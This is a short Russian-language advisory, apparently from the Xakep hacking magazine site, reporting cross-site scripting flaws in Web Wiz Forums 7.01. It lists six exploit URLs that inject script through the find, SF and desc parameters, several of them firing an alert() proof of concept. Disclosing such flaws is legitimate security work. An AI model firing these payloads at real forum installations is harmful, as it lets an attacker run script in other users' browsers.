Межсайтовый скриптинг в Web Wiz Forums

Рекомендуем почитать:

Xakep #299. Sysmon

Программа: Web Wiz Forums ver. 7.01

Уязвимость обнаружена в Web Wiz Forums. Удаленный пользователь может выполнить XSS нападение.
Уязвимость обнаружена в нескольких параметрах в сценариях forum_members.asp, members.asp, pm_buddy_list.asp и search.asp.

Пример/Эксплоит:

http://[TARGET]/ forum_members.asp?find=%22;} [CODE];function%20x(){v%20=%22

http://[TARGET]/ forum_members.asp?find=%22;} ALERT('XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/ members.asp?SF=%22;}[CODE] function%20x(){v%20=%22

http://[TARGET]/ members.asp?SF=%22;}ALERT(' XSS atack by [HEX] (c) [CSL]');function%20x(){v%20=%22

http://[TARGET]/ pm_buddy_list.asp?name=A& desc=B%22%3E[CODE]%3Ca%20s=%22&code=1

http://[TARGET]/ pm_buddy_list.asp?name=A& desc=B%22%3E<SCRIPT>ALERT('XSS atack by
[HEX] (c) [CSL]');</SCRIPT>%3Ca%20s=%22&code=1

Межсайтовый скриптинг в Web Wiz Forums

Xakep #299. Sysmon

Подпишись на наc в Telegram!

Из рубрики «Взлом»

Как работает EDR. Подробно разбираем механизмы антивирусной защиты

WinAPI днем и ночью. Ищем способы обращения к нативному коду из C#

Обзор перспективных исследований. Колонка Дениса Макрушина

HTB Hospital. Получаем доступ к хосту через уязвимость Ghostscript

Трюки

Липовый соникс. Реверсим картридж Liposonix и пишем его эмулятор

Новая диета для Linux. Загружаем современный Linux, используя минимум памяти

Фишинг в соцсетях. Как социальные сети помогают хакерам

Сделай мне красиво! Изобретаем персональный нейросетевой фотоувеличитель

Последние новости

Фальшивые читы обманом вынуждают геймеров распространять малварь

Правоохранители закрыли фишинговую платформу LabHost

Исследователи нашли сайт, торгующий миллиардами сообщений из Discord

Майнеры используют уязвимости в OpenMetadata и оставляют жертвам записки

Microsoft случайно добавила Copilot в Windows Server